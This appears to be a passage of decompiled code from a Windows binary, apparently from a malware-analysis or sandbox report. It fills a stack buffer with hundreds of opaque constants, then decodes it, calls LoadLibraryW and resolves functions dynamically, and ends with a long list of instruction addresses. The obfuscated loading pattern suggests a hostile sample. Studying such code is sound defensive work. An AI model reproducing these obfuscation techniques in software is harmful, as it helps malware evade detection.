				 *((intOrPtr*)(_t458 - 0x51c)) = 0x9c9671b5;
				 *((intOrPtr*)(_t458 - 0x518)) = 0x1c4f9608;
				 *((intOrPtr*)(_t458 - 0x514)) = 0xca403f30;
				 *((intOrPtr*)(_t458 - 0x510)) = 0x5dd9a9ed;
				 *((intOrPtr*)(_t458 - 0x50c)) = 0x66335b60;
				 *((intOrPtr*)(_t458 - 0x508)) = 0xbcc96e3a;
				 *((intOrPtr*)(_t458 - 0x504)) = 0xa2d91c00;
				 *((intOrPtr*)(_t458 - 0x500)) = 0xe613adb9;
				 *((intOrPtr*)(_t458 - 0x4fc)) = 0x6616b77e;
				 *((intOrPtr*)(_t458 - 0x4f8)) = 0xabe5552b;
				 *((intOrPtr*)(_t458 - 0x4f4)) = 0xb8ff5ee6;
				 *((intOrPtr*)(_t458 - 0x4f0)) = 0x2086c469;
				 *((intOrPtr*)(_t458 - 0x4ec)) = 0xe0239dc3;
				 *((intOrPtr*)(_t458 - 0x4e8)) = 0xc3263e1a;
				 *((intOrPtr*)(_t458 - 0x4e4)) = 0x428ec360;
				 *((intOrPtr*)(_t458 - 0x4e0)) = 0xf9a13680;
				 *((intOrPtr*)(_t458 - 0x4dc)) = 0xabaefaf3;
				 *((intOrPtr*)(_t458 - 0x4d8)) = 0xaf94009f;
				 *((intOrPtr*)(_t458 - 0x4d4)) = 0x56fe2ec9;
				 *((intOrPtr*)(_t458 - 0x4d0)) = 0x5071d23e;
				 *((intOrPtr*)(_t458 - 0x4cc)) = 0xfff752a2;
				 *((intOrPtr*)(_t458 - 0x4c8)) = 0xac4fe0c7;
				 *((intOrPtr*)(_t458 - 0x4c4)) = 0x2ba7b1;
				 *((intOrPtr*)(_t458 - 0x4c0)) = 0xf5e502cf;
				 *((intOrPtr*)(_t458 - 0x4bc)) = 0xa1cf24e7;
				 *((intOrPtr*)(_t458 - 0x4b8)) = 0x72420150;
				 *((intOrPtr*)(_t458 - 0x4b4)) = 0xd803a74a;
				 *((intOrPtr*)(_t458 - 0x4b0)) = 0x3e6b43d;
				 *((intOrPtr*)(_t458 - 0x4ac)) = 0x5d5d6469;
				 *((intOrPtr*)(_t458 - 0x4a8)) = 0xdda071a9;
				 *((intOrPtr*)(_t458 - 0x4a4)) = 0x68eb4f5c;
				 *((intOrPtr*)(_t458 - 0x4a0)) = 0x3de89dae;
				 *((intOrPtr*)(_t458 - 0x49c)) = 0xf4b9f51d;
				 *((intOrPtr*)(_t458 - 0x498)) = 0xaa80dabf;
				 *((intOrPtr*)(_t458 - 0x494)) = 0x1757af66;
				 *((intOrPtr*)(_t458 - 0x490)) = 0x4ee339e6;
				 *((intOrPtr*)(_t458 - 0x48c)) = 0x4845057f;
				 *((intOrPtr*)(_t458 - 0x488)) = 0xc184ba6d;
				 *((intOrPtr*)(_t458 - 0x484)) = 0xeb8bbfab;
				 *((intOrPtr*)(_t458 - 0x480)) = 0xae13fe43;
				 *((intOrPtr*)(_t458 - 0x47c)) = 0xbd14a503;
				 *((intOrPtr*)(_t458 - 0x478)) = 0x9ca6134c;
				 *((intOrPtr*)(_t458 - 0x474)) = 0x5fdde9a3;
				 *((intOrPtr*)(_t458 - 0x470)) = 0x399a2512;
				 *((intOrPtr*)(_t458 - 0x46c)) = 0x6526db0;
				 *((intOrPtr*)(_t458 - 0x468)) = 0x5bba9685;
				 *((intOrPtr*)(_t458 - 0x464)) = 0x89becd2b;
				 *((intOrPtr*)(_t458 - 0x460)) = 0x6fbbf825;
				 *((intOrPtr*)(_t458 - 0x45c)) = 0x6c94c415;
				 *((intOrPtr*)(_t458 - 0x458)) = 0xdbed85bd;
				 *((intOrPtr*)(_t458 - 0x454)) = 0x443e979e;
				 *((intOrPtr*)(_t458 - 0x450)) = 0x6f2c9de2;
				 *((intOrPtr*)(_t458 - 0x44c)) = 0x330288a8;
				 *((intOrPtr*)(_t458 - 0x448)) = 0xedc2455f;
				 *((intOrPtr*)(_t458 - 0x444)) = 0x66c0e420;
				 *((intOrPtr*)(_t458 - 0x440)) = 0xd73ab2e6;
				 *((intOrPtr*)(_t458 - 0x43c)) = 0x8be9554f;
				 *((intOrPtr*)(_t458 - 0x438)) = 0xcf5027b3;
				 *((intOrPtr*)(_t458 - 0x434)) = 0x9067ebc8;
				 *((intOrPtr*)(_t458 - 0x430)) = 0xaa22b0b3;
				 *((intOrPtr*)(_t458 - 0x42c)) = 0x3851fead;
				 *((intOrPtr*)(_t458 - 0x428)) = 0x2f7526b0;
				 *((intOrPtr*)(_t458 - 0x424)) = 0x5d4f1f1e;
				 *((intOrPtr*)(_t458 - 0x420)) = 0x4d3fdd93;
				 *((intOrPtr*)(_t458 - 0x41c)) = 0xddd9b7a8;
				 *((intOrPtr*)(_t458 - 0x418)) = 0x4c64278c;
				 *((intOrPtr*)(_t458 - 0x414)) = 0x920d0666;
				 *((intOrPtr*)(_t458 - 0x410)) = 0x68b2858a;
				 *((intOrPtr*)(_t458 - 0x40c)) = 0xcc1e1b51;
				 *((intOrPtr*)(_t458 - 0x408)) = 0x5d4cd103;
				 *((intOrPtr*)(_t458 - 0x404)) = 0x4b0b3d02;
				 *((intOrPtr*)(_t458 - 0x400)) = 0x3fff073d;
				 *((intOrPtr*)(_t458 - 0x3fc)) = 0xd88655c2;
				 *((intOrPtr*)(_t458 - 0x3f8)) = 0xb95f567d;
				 *((intOrPtr*)(_t458 - 0x3f4)) = 0x11b0fb7e;
				 *((intOrPtr*)(_t458 - 0x3f0)) = 0x77daa959;
				 *((intOrPtr*)(_t458 - 0x3ec)) = 0x438e29f3;
				 *((intOrPtr*)(_t458 - 0x3e8)) = 0xc5994ae2;
				 *((intOrPtr*)(_t458 - 0x3e4)) = 0xa6a045ad;
				 *((intOrPtr*)(_t458 - 0x3e0)) = 0x3d63e929;
				 *((intOrPtr*)(_t458 - 0x3dc)) = 0x79ec7dfa;
				 *((intOrPtr*)(_t458 - 0x3d8)) = 0x982cda2c;
				 *((intOrPtr*)(_t458 - 0x3d4)) = 0xf0f0cca7;
				 *((intOrPtr*)(_t458 - 0x3d0)) = 0x55a91b1b;
				 *((intOrPtr*)(_t458 - 0x3cc)) = 0x187f46cc;
				 *((intOrPtr*)(_t458 - 0x3c8)) = 0xa84022ec;
				 *((intOrPtr*)(_t458 - 0x3c4)) = 0x68f4cdd5;
				 *((intOrPtr*)(_t458 - 0x3c0)) = 0x69fc83cf;
				 *((intOrPtr*)(_t458 - 0x3bc)) = 0xdf75514e;
				 *((intOrPtr*)(_t458 - 0x3b8)) = 0xd7493ee1;
				 *((intOrPtr*)(_t458 - 0x3b4)) = 0xf957dba7;
				 *((intOrPtr*)(_t458 - 0x3b0)) = 0x5711ace8;
				 *((intOrPtr*)(_t458 - 0x3ac)) = 0xfec64cd4;
				 *((intOrPtr*)(_t458 - 0x3a8)) = 0xd219ac6e;
				 *((intOrPtr*)(_t458 - 0x3a4)) = 0xb9dd49ba;
				 *((intOrPtr*)(_t458 - 0x3a0)) = 0xf1c1aaf2;
				 *((intOrPtr*)(_t458 - 0x39c)) = 0xfa862c04;
				 *((intOrPtr*)(_t458 - 0x398)) = 0xf6cd5af7;
				 *((intOrPtr*)(_t458 - 0x394)) = 0x895f4760;
				 *((intOrPtr*)(_t458 - 0x390)) = 0x13ca523e;
				 *((intOrPtr*)(_t458 - 0x38c)) = 0x5bf7b752;
				 *((intOrPtr*)(_t458 - 0x388)) = 0xd722a54f;
				 *((intOrPtr*)(_t458 - 0x384)) = 0x5ac47bfc;
				 *((intOrPtr*)(_t458 - 0x380)) = 0x8ff35fb7;
				 *((intOrPtr*)(_t458 - 0x37c)) = 0xad1a5747;
				 *((intOrPtr*)(_t458 - 0x378)) = 0x91c91da6;
				 *((intOrPtr*)(_t458 - 0x374)) = 0xcb7e89ca;
				 *((intOrPtr*)(_t458 - 0x370)) = 0xbb02fcf3;
				 *((intOrPtr*)(_t458 - 0x36c)) = 0xd7e583b;
				 *((intOrPtr*)(_t458 - 0x368)) = 0x12d4eea1;
				 *((intOrPtr*)(_t458 - 0x364)) = 0x19b30eb3;
				 *((intOrPtr*)(_t458 - 0x360)) = 0xf11f081b;
				 *((intOrPtr*)(_t458 - 0x35c)) = 0x8d8fc20b;
				 *((intOrPtr*)(_t458 - 0x358)) = 0x25dadec;
				 *((intOrPtr*)(_t458 - 0x354)) = 0xa6162487;
				 *((intOrPtr*)(_t458 - 0x350)) = 0xa583471e;
				 *((intOrPtr*)(_t458 - 0x34c)) = 0xf49f8fe;
				 *((intOrPtr*)(_t458 - 0x348)) = 0x7a6bf328;
				 *((intOrPtr*)(_t458 - 0x344)) = 0xe01f04ab;
				 *((intOrPtr*)(_t458 - 0x340)) = 0x53b5bd1c;
				 *((intOrPtr*)(_t458 - 0x33c)) = 0xac336357;
				 *((intOrPtr*)(_t458 - 0x338)) = 0xbe3885cc;
				 *((intOrPtr*)(_t458 - 0x334)) = 0xa129f609;
				 *((intOrPtr*)(_t458 - 0x330)) = 0x13657743;
				 *((intOrPtr*)(_t458 - 0x32c)) = 0xd1e2fa2d;
				 *((intOrPtr*)(_t458 - 0x328)) = 0x48c685fa;
				 *((intOrPtr*)(_t458 - 0x324)) = 0x8447bee7;
				 *((intOrPtr*)(_t458 - 0x320)) = 0x266e1477;
				 *((intOrPtr*)(_t458 - 0x31c)) = 0x3006ffe4;
				 *((intOrPtr*)(_t458 - 0x318)) = 0xaf83da7a;
				 *((intOrPtr*)(_t458 - 0x314)) = 0x7fb38b8b;
				 *((intOrPtr*)(_t458 - 0x310)) = 0x69a5a93d;
				 *((intOrPtr*)(_t458 - 0x30c)) = 0x7b7235d4;
				 *((intOrPtr*)(_t458 - 0x308)) = 0x651115ef;
				 *((intOrPtr*)(_t458 - 0x304)) = 0x4b9ec357;
				 *((intOrPtr*)(_t458 - 0x300)) = 0x5292425b;
				 *((intOrPtr*)(_t458 - 0x2fc)) = 0xd78eee4;
				 *((intOrPtr*)(_t458 - 0x2f8)) = 0x19162831;
				 *((intOrPtr*)(_t458 - 0x2f4)) = 0x77537276;
				 *((intOrPtr*)(_t458 - 0x2f0)) = 0xaa601805;
				 *((intOrPtr*)(_t458 - 0x2ec)) = 0xd144598e;
				 *((intOrPtr*)(_t458 - 0x2e8)) = 0x4ae3acdf;
				 *((intOrPtr*)(_t458 - 0x2e4)) = 0xb61fddfb;
				 *((intOrPtr*)(_t458 - 0x2e0)) = 0xcde1ea6e;
				 *((intOrPtr*)(_t458 - 0x2dc)) = 0x444f3549;
				 *((intOrPtr*)(_t458 - 0x2d8)) = 0xf115d51b;
				 *((intOrPtr*)(_t458 - 0x2d4)) = 0xe89e8176;
				 *((intOrPtr*)(_t458 - 0x2d0)) = 0xb081a7e9;
				 *((intOrPtr*)(_t458 - 0x2cc)) = 0xb1fcd9f3;
				 *((intOrPtr*)(_t458 - 0x2c8)) = 0xc542dd5d;
				 *((intOrPtr*)(_t458 - 0x2c4)) = 0xa18d833a;
				 *((intOrPtr*)(_t458 - 0x2c0)) = 0x6d034f35;
				 *((intOrPtr*)(_t458 - 0x2bc)) = 0x53a15a01;
				 *((intOrPtr*)(_t458 - 0x2b8)) = 0xbbb7d74e;
				 *((intOrPtr*)(_t458 - 0x2b4)) = 0x1eed101f;
				 *((intOrPtr*)(_t458 - 0x2b0)) = 0x3c760d89;
				 *((intOrPtr*)(_t458 - 0x2ac)) = 0xbfda7826;
				 *((intOrPtr*)(_t458 - 0x2a8)) = 0x1b942e9f;
				 *((intOrPtr*)(_t458 - 0x2a4)) = 0x5a729f8a;
				 *((intOrPtr*)(_t458 - 0x2a0)) = 0x7897d276;
				 *((intOrPtr*)(_t458 - 0x29c)) = 0x3be5f0ff;
				 *((intOrPtr*)(_t458 - 0x298)) = 0xf5227339;
				 *((intOrPtr*)(_t458 - 0x294)) = 0x4d681776;
				 *((intOrPtr*)(_t458 - 0x290)) = 0x2552c3bf;
				 *((intOrPtr*)(_t458 - 0x28c)) = 0x647a00e0;
				 *((intOrPtr*)(_t458 - 0x288)) = 0x49b9f45a;
				 *((intOrPtr*)(_t458 - 0x284)) = 0x4e1fb5ee;
				 *((intOrPtr*)(_t458 - 0x280)) = 0x2ed5015;
				 *((intOrPtr*)(_t458 - 0x27c)) = 0x10383c27;
				 *((intOrPtr*)(_t458 - 0x278)) = 0xb8a0a2aa;
				 *((intOrPtr*)(_t458 - 0x274)) = 0x1d3cd2df;
				 *((intOrPtr*)(_t458 - 0x270)) = 0x87eeb113;
				 *((intOrPtr*)(_t458 - 0x26c)) = 0xfd10e020;
				 *((intOrPtr*)(_t458 - 0x268)) = 0x997bbe97;
				 *((intOrPtr*)(_t458 - 0x264)) = 0xd9765f4c;
				 *((intOrPtr*)(_t458 - 0x260)) = 0x85eb0547;
				 *((intOrPtr*)(_t458 - 0x25c)) = 0x942f670;
				 *((intOrPtr*)(_t458 - 0x258)) = 0xc177bce9;
				 *((intOrPtr*)(_t458 - 0x254)) = 0xf5c76bb;
				 *((intOrPtr*)(_t458 - 0x250)) = 0x70946d51;
				 *((intOrPtr*)(_t458 - 0x24c)) = 0x369b12a0;
				 *((intOrPtr*)(_t458 - 0x248)) = 0x57a8f614;
				 *((intOrPtr*)(_t458 - 0x244)) = 0xcf251ab4;
				 *((intOrPtr*)(_t458 - 0x240)) = 0xe749b259;
				 *((intOrPtr*)(_t458 - 0x23c)) = 0x1bfc4bb6;
				 *((intOrPtr*)(_t458 - 0x238)) = 0x94aabb06;
				 *((intOrPtr*)(_t458 - 0x234)) = 0x7b874450;
				 *((intOrPtr*)(_t458 - 0x230)) = 0x6c6099d9;
				 *((intOrPtr*)(_t458 - 0x22c)) = 0xc0ea1b84;
				 *((intOrPtr*)(_t458 - 0x228)) = 0xe8f0eff6;
				 *((intOrPtr*)(_t458 - 0x224)) = 0x5f844d8c;
				 *((intOrPtr*)(_t458 - 0x220)) = 0x13c8bc55;
				 *((intOrPtr*)(_t458 - 0x21c)) = 0x3fd57c84;
				 *((intOrPtr*)(_t458 - 0x218)) = 0x9f600e35;
				 *((intOrPtr*)(_t458 - 0x214)) = 0xc194c32a;
				 *((intOrPtr*)(_t458 - 0x210)) = 0x8689e68e;
				 *((intOrPtr*)(_t458 - 0x20c)) = 0x392b67fb;
				 *((intOrPtr*)(_t458 - 0x208)) = 0xae81f054;
				 *((intOrPtr*)(_t458 - 0x204)) = 0x19f97d8a;
				 *((intOrPtr*)(_t458 - 0x200)) = 0xe67c22b4;
				 *((intOrPtr*)(_t458 - 0x1fc)) = 0x80134361;
				 *((intOrPtr*)(_t458 - 0x1f8)) = 0x911bc406;
				 *((intOrPtr*)(_t458 - 0x1f4)) = 0x2fb3992d;
				 *((intOrPtr*)(_t458 - 0x1f0)) = 0x361c00cb;
				 *((intOrPtr*)(_t458 - 0x1ec)) = 0xff632ea4;
				 *((intOrPtr*)(_t458 - 0x1e8)) = 0xf5095783;
				 *((intOrPtr*)(_t458 - 0x1e4)) = 0x4a91f216;
				 *((intOrPtr*)(_t458 - 0x1e0)) = 0x5a8803e0;
				 *((intOrPtr*)(_t458 - 0x1dc)) = 0x159ae6b9;
				 *((intOrPtr*)(_t458 - 0x1d8)) = 0xd45fb44f;
				 *((intOrPtr*)(_t458 - 0x1d4)) = 0x66ce62e1;
				 *((intOrPtr*)(_t458 - 0x1d0)) = 0xc9457fab;
				 *((intOrPtr*)(_t458 - 0x1cc)) = 0x624faadb;
				 *((intOrPtr*)(_t458 - 0x1c8)) = 0x90670fc;
				 *((intOrPtr*)(_t458 - 0x1c4)) = 0xf2309aa6;
				 *((intOrPtr*)(_t458 - 0x1c0)) = 0x1051d1bc;
				 *((intOrPtr*)(_t458 - 0x1bc)) = 0xa7086226;
				 *((intOrPtr*)(_t458 - 0x1b8)) = 0x7c784b46;
				 *((intOrPtr*)(_t458 - 0x1b4)) = 0x8c162390;
				 *((intOrPtr*)(_t458 - 0x1b0)) = 0x6fd97b55;
				 *((intOrPtr*)(_t458 - 0x1ac)) = 0xcffa16ef;
				 *((intOrPtr*)(_t458 - 0x1a8)) = 0x8fd0e83f;
				 *((intOrPtr*)(_t458 - 0x1a4)) = 0xbae82af6;
				 *((intOrPtr*)(_t458 - 0x1a0)) = 0x1dc9e9e3;
				 *((intOrPtr*)(_t458 - 0x19c)) = 0xce43faf8;
				 *((intOrPtr*)(_t458 - 0x198)) = 0x5c64b3ae;
				 *((intOrPtr*)(_t458 - 0x194)) = 0x46b61507;
				 *((intOrPtr*)(_t458 - 0x190)) = 0xfa06676;
				 *((intOrPtr*)(_t458 - 0x18c)) = 0xbda36a33;
				 *((intOrPtr*)(_t458 - 0x188)) = 0x85be4308;
				 *((intOrPtr*)(_t458 - 0x184)) = 0x21782aaa;
				 *((intOrPtr*)(_t458 - 0x180)) = 0xdf4821c4;
				 *((intOrPtr*)(_t458 - 0x17c)) = 0x423352fb;
				 *((intOrPtr*)(_t458 - 0x178)) = 0xcc75e1c3;
				 *((intOrPtr*)(_t458 - 0x174)) = 0xec2effc7;
				 *((intOrPtr*)(_t458 - 0x170)) = 0x8b81e46d;
				 *((intOrPtr*)(_t458 - 0x16c)) = 0xd72ab33c;
				 *((intOrPtr*)(_t458 - 0x168)) = 0x795e5b8e;
				 *((intOrPtr*)(_t458 - 0x164)) = 0x8f281fb9;
				 *((intOrPtr*)(_t458 - 0x160)) = 0x8367df5e;
				 *((intOrPtr*)(_t458 - 0x15c)) = 0x8a6371e1;
				 *((intOrPtr*)(_t458 - 0x158)) = 0xe5c382b7;
				 *((intOrPtr*)(_t458 - 0x154)) = 0x2e8ae82c;
				 *((intOrPtr*)(_t458 - 0x150)) = 0xe07c17d7;
				 *((intOrPtr*)(_t458 - 0x14c)) = 0xebfcc6c0;
				 *((intOrPtr*)(_t458 - 0x148)) = 0xc93bc6f;
				 *((intOrPtr*)(_t458 - 0x144)) = 0x4339e276;
				 *((intOrPtr*)(_t458 - 0x140)) = 0xe066581c;
				 *((intOrPtr*)(_t458 - 0x13c)) = 0x8f94f706;
				 *((intOrPtr*)(_t458 - 0x138)) = 0x2fbd3552;
				 *((intOrPtr*)(_t458 - 0x134)) = 0x375de5eb;
				 *((intOrPtr*)(_t458 - 0x130)) = 0xfa79b3d7;
				 *((intOrPtr*)(_t458 - 0x12c)) = 0xf494e268;
				 *((intOrPtr*)(_t458 - 0x128)) = 0x60e94453;
				 *((intOrPtr*)(_t458 - 0x124)) = 0xb9aad604;
				 *((intOrPtr*)(_t458 - 0x120)) = 0xaf7037c4;
				 *((intOrPtr*)(_t458 - 0x11c)) = 0x356d856b;
				 *((intOrPtr*)(_t458 - 0x118)) = 0x97dcdd11;
				 *((intOrPtr*)(_t458 - 0x114)) = 0xf67e22f9;
				 *((intOrPtr*)(_t458 - 0x110)) = 0x740f58ff;
				 *((intOrPtr*)(_t458 - 0x10c)) = 0x41f8f4c8;
				 *((intOrPtr*)(_t458 - 0x108)) = 0xba3ef071;
				 *((intOrPtr*)(_t458 - 0x104)) = 0xf280b86c;
				 *((intOrPtr*)(_t458 - 0x100)) = 0xbf859c4c;
				 *((intOrPtr*)(_t458 - 0xfc)) = 0xf87efbbf;
				 *((intOrPtr*)(_t458 - 0xf8)) = 0x54fc53bf;
				 *((intOrPtr*)(_t458 - 0xf4)) = 0x13e20347;
				 *((intOrPtr*)(_t458 - 0xf0)) = 0x32db63b2;
				 *((intOrPtr*)(_t458 - 0xec)) = 0x8b82eebc;
				 *((intOrPtr*)(_t458 - 0xe8)) = 0xba583bcc;
				 *((intOrPtr*)(_t458 - 0xe4)) = 0xa7933b16;
				 *((intOrPtr*)(_t458 - 0xe0)) = 0xe9aab750;
				 *((intOrPtr*)(_t458 - 0xdc)) = 0x4d39111d;
				 *((intOrPtr*)(_t458 - 0xd8)) = 0xce85029;
				 *((intOrPtr*)(_t458 - 0xd4)) = 0xba52ae4c;
				 *((intOrPtr*)(_t458 - 0xd0)) = 0x65966e3f;
				 *((intOrPtr*)(_t458 - 0xcc)) = 0xdc48fa27;
				 *((intOrPtr*)(_t458 - 0xc8)) = 0xd0a092ee;
				 *((intOrPtr*)(_t458 - 0xc4)) = 0x19d84942;
				 *((intOrPtr*)(_t458 - 0xc0)) = 0x189fc3f8;
				 *((intOrPtr*)(_t458 - 0xbc)) = 0x2d81ce0d;
				 *((intOrPtr*)(_t458 - 0xb8)) = 0x79237d0a;
				 *((intOrPtr*)(_t458 - 0xb4)) = 0xf43ae721;
				 *((intOrPtr*)(_t458 - 0xb0)) = 0x396c4832;
				 *((intOrPtr*)(_t458 - 0xac)) = 0xad82a21e;
				 *((intOrPtr*)(_t458 - 0xa8)) = 0x63cf86a6;
				 *((intOrPtr*)(_t458 - 0xa4)) = 0xeb571a80;
				 *((intOrPtr*)(_t458 - 0xa0)) = 0x86f15feb;
				 *((intOrPtr*)(_t458 - 0x9c)) = 0xd28d838a;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t458 - 0x98)) = 0xfe8dfb44;
				 *((intOrPtr*)(_t458 - 0x94)) = 0x4370c9d;
				 *((intOrPtr*)(_t458 - 0x90)) = 0x1da1668;
				 *((intOrPtr*)(_t458 - 0x8c)) = 0x251429a;
				 *((intOrPtr*)(_t458 - 0x88)) = 0x89015f28;
				 *((intOrPtr*)(_t458 - 0x84)) = 0xbfc77fb0;
				 *((intOrPtr*)(_t458 - 0x80)) = 0xa39618a7;
				 *((intOrPtr*)(_t458 - 0x7c)) = 0x939ef23b;
				 *((intOrPtr*)(_t458 - 0x78)) = 0xe5a12e67;
				 *((intOrPtr*)(_t458 - 0x74)) = 0xc50bbbcf;
				 *((intOrPtr*)(_t458 - 0x70)) = 0x8820bf78;
				 *((intOrPtr*)(_t458 - 0x6c)) = 0x371d16a4;
				 *((intOrPtr*)(_t458 - 0x68)) = 0xa9fa143c;
				 *((intOrPtr*)(_t458 - 0x64)) = 0x80ee9485;
				 *((intOrPtr*)(_t458 - 0x60)) = 0x353f2b20;
				 *((intOrPtr*)(_t458 - 0x5c)) = 0x4456af21;
				 *((intOrPtr*)(_t458 - 0x58)) = 0x1dd7bd92;
				 *((intOrPtr*)(_t458 - 0x54)) = 0x4e8e3507;
				 *((intOrPtr*)(_t458 - 0x50)) = 0xb6d9592c;
				 *((intOrPtr*)(_t458 - 0x4c)) = 0x6b8eb4b3;
				 *((intOrPtr*)(_t458 - 0x48)) = 0x53054c9b;
				 *((intOrPtr*)(_t458 - 0x44)) = 0xb80a7f52;
				 *((intOrPtr*)(_t458 - 0x40)) = 0xce9a943e;
				 *((intOrPtr*)(_t458 - 0x3c)) = 0x10881e00;
				 *((intOrPtr*)(_t458 - 0x38)) = 0x98674cb6;
				 *((intOrPtr*)(_t458 - 0x34)) = 0xe1c2946c;
				 *((intOrPtr*)(_t458 - 0x30)) = 0xc433ea8e;
				 *((intOrPtr*)(_t458 - 0x2c)) = 0x2ab6fbdf;
				 *((intOrPtr*)(_t458 - 0x28)) = 0x819602d2;
				 *((intOrPtr*)(_t458 - 0x24)) = 0xb8fb5e08;
				 *((intOrPtr*)(_t458 - 0x20)) = 0xb2e89823;
				 *((intOrPtr*)(_t458 - 0x1c)) = 0x27f13fd;
				 *((intOrPtr*)(_t458 - 0x18)) = 0x4efc0ded;
				 *((intOrPtr*)(_t458 - 0x14)) = 0xf6aedfef;
				 *((intOrPtr*)(_t458 - 0x10)) = 0xf5e01de1;
				 *((intOrPtr*)(_t458 - 0xc)) = 0xbf4c0dac;
				 *((intOrPtr*)(_t458 - 8)) = 0x41ca0d05;
				 *((intOrPtr*)(_t458 - 4)) = 0x7c5e35b;
				_t456 = L02D61D10(0x2d73370, 0x1b8, __edi, __esi);
				 *0x2d771e4 = LoadLibraryW(_t444);
				L02D61DB0(_t456);
				return E02D61570(_t448,  *0x2d771e4, _t458 - 0x6e8, _t456, 0x1ba, 0x13b56120, 0x2d75450);
			}

0x02d6814a
0x02d6814a
0x02d68154
0x02d6815e
0x02d68168
0x02d68172
0x02d6817c
0x02d68186
0x02d68190
0x02d6819a
0x02d681a4
0x02d681ae
0x02d681b8
0x02d681c2
0x02d681cc
0x02d681d6
0x02d681e0
0x02d681ea
0x02d681f4
0x02d681fe
0x02d68208
0x02d68212
0x02d6821c
0x02d68226
0x02d68230
0x02d6823a
0x02d68244
0x02d6824e
0x02d68258
0x02d68262
0x02d6826c
0x02d68276
0x02d68280
0x02d6828a
0x02d68294
0x02d6829e
0x02d682a8
0x02d682b2
0x02d682bc
0x02d682c6
0x02d682d0
0x02d682da
0x02d682e4
0x02d682ee
0x02d682f8
0x02d68302
0x02d6830c
0x02d68316
0x02d68320
0x02d6832a
0x02d68334
0x02d6833e
0x02d68348
0x02d68352
0x02d6835c
0x02d68366
0x02d68370
0x02d6837a
0x02d68384
0x02d6838e
0x02d68398
0x02d683a2
0x02d683ac
0x02d683b6
0x02d683c0
0x02d683ca
0x02d683d4
0x02d683de
0x02d683e8
0x02d683f2
0x02d683fc
0x02d68406
0x02d68410
0x02d6841a
0x02d68424
0x02d6842e
0x02d68438
0x02d68442
0x02d6844c
0x02d68456
0x02d68460
0x02d6846a
0x02d68474
0x02d6847e
0x02d68488
0x02d68492
0x02d6849c
0x02d684a6
0x02d684b0
0x02d684ba
0x02d684c4
0x02d684ce
0x02d684d8
0x02d684e2
0x02d684ec
0x02d684f6
0x02d68500
0x02d6850a
0x02d68514
0x02d6851e
0x02d68528
0x02d68532
0x02d6853c
0x02d68546
0x02d68550
0x02d6855a
0x02d68564
0x02d6856e
0x02d68578
0x02d68582
0x02d6858c
0x02d68596
0x02d685a0
0x02d685aa
0x02d685b4
0x02d685be
0x02d685c8
0x02d685d2
0x02d685dc
0x02d685e6
0x02d685f0
0x02d685fa
0x02d68604
0x02d6860e
0x02d68618
0x02d68622
0x02d6862c
0x02d68636
0x02d68640
0x02d6864a
0x02d68654
0x02d6865e
0x02d68668
0x02d68672
0x02d6867c
0x02d68686
0x02d68690
0x02d6869a
0x02d686a4
0x02d686ae
0x02d686b8
0x02d686c2
0x02d686cc
0x02d686d6
0x02d686e0
0x02d686ea
0x02d686f4
0x02d686fe
0x02d68708
0x02d68712
0x02d6871c
0x02d68726
0x02d68730
0x02d6873a
0x02d68744
0x02d6874e
0x02d68758
0x02d68762
0x02d6876c
0x02d68776
0x02d68780
0x02d6878a
0x02d68794
0x02d6879e
0x02d687a8
0x02d687b2
0x02d687bc
0x02d687c6
0x02d687d0
0x02d687da
0x02d687e4
0x02d687ee
0x02d687f8
0x02d68802
0x02d6880c
0x02d68816
0x02d68820
0x02d6882a
0x02d68834
0x02d6883e
0x02d68848
0x02d68852
0x02d6885c
0x02d68866
0x02d68870
0x02d6887a
0x02d68884
0x02d6888e
0x02d68898
0x02d688a2
0x02d688ac
0x02d688b6
0x02d688c0
0x02d688ca
0x02d688d4
0x02d688de
0x02d688e8
0x02d688f2
0x02d688fc
0x02d68906
0x02d68910
0x02d6891a
0x02d68924
0x02d6892e
0x02d68938
0x02d68942
0x02d6894c
0x02d68956
0x02d68960
0x02d6896a
0x02d68974
0x02d6897e
0x02d68988
0x02d68992
0x02d6899c
0x02d689a6
0x02d689b0
0x02d689ba
0x02d689c4
0x02d689ce
0x02d689d8
0x02d689e2
0x02d689ec
0x02d689f6
0x02d68a00
0x02d68a0a
0x02d68a14
0x02d68a1e
0x02d68a28
0x02d68a32
0x02d68a3c
0x02d68a46
0x02d68a50
0x02d68a5a
0x02d68a64
0x02d68a6e
0x02d68a78
0x02d68a82
0x02d68a8c
0x02d68a96
0x02d68aa0
0x02d68aaa
0x02d68ab4
0x02d68abe
0x02d68ac8
0x02d68ad2
0x02d68adc
0x02d68ae6
0x02d68af0
0x02d68afa
0x02d68b04
0x02d68b0e
0x02d68b18
0x02d68b22
0x02d68b2c
0x02d68b36
0x02d68b40
0x02d68b4a
0x02d68b54
0x02d68b5e
0x02d68b68
0x02d68b72
0x02d68b7c
0x02d68b86
0x02d68b90
0x02d68b9a
0x02d68ba4
0x02d68bae
0x02d68bb8
0x02d68bc2
0x02d68bcc
0x02d68bd6
0x02d68be0
0x02d68bea
0x02d68bf4
0x02d68bfe
0x02d68c08
0x02d68c12
0x02d68c1c
0x02d68c26
0x02d68c30
0x02d68c3a
0x02d68c44
0x02d68c4e
0x02d68c58
0x02d68c62
0x02d68c6c
0x02d68c76
0x02d68c80
0x02d68c8a
0x02d68c94
0x02d68c9e
0x02d68ca8
0x02d68cb2
0x02d68cbc
0x02d68cc6
0x02d68cd0
0x02d68cda
0x02d68ce4
0x02d68cee
0x02d68cf8
0x02d68d02
0x02d68d0c
0x02d68d16
0x02d68d20
0x02d68d2a
0x02d68d34
0x02d68d3e
0x02d68d48
0x02d68d52
0x02d68d5c
0x02d68d66
0x02d68d70
0x02d68d7a
0x02d68d84
0x02d68d8e
0x02d68d98
0x02d68da2
0x02d68dac
0x02d68db6
0x02d68dc0
0x02d68dca
0x02d68dd4
0x02d68dde
0x02d68de8
0x02d68df2
0x02d68dfc
0x02d68e06
0x02d68e10
0x02d68e1a
0x02d68e24
0x02d68e2e
0x02d68e38
0x02d68e42
0x02d68e4c
0x02d68e56
0x02d68e60
0x02d68e6a
0x02d68e74
0x02d68e7e
0x02d68e88
0x02d68e92
0x02d68e9c
0x02d68ea6
0x02d68eb0
0x02d68eba
0x02d68ec4
0x02d68ece
0x02d68ed8
0x02d68ee2
0x02d68eec
0x02d68ef6
0x02d68f00
0x02d68f0a
0x02d68f14
0x02d68f1e
0x02d68f28
0x02d68f32
0x02d68f3c
0x02d68f46
0x02d68f50
0x02d68f5a
0x02d68f64
0x02d68f6e
0x02d68f78
0x02d68f82
0x02d68f8c
0x02d68f96
0x02d68fa0
0x02d68faa
0x02d68fb4
0x02d68fbe
0x02d68fc8
0x02d68fd2
0x02d68fdc
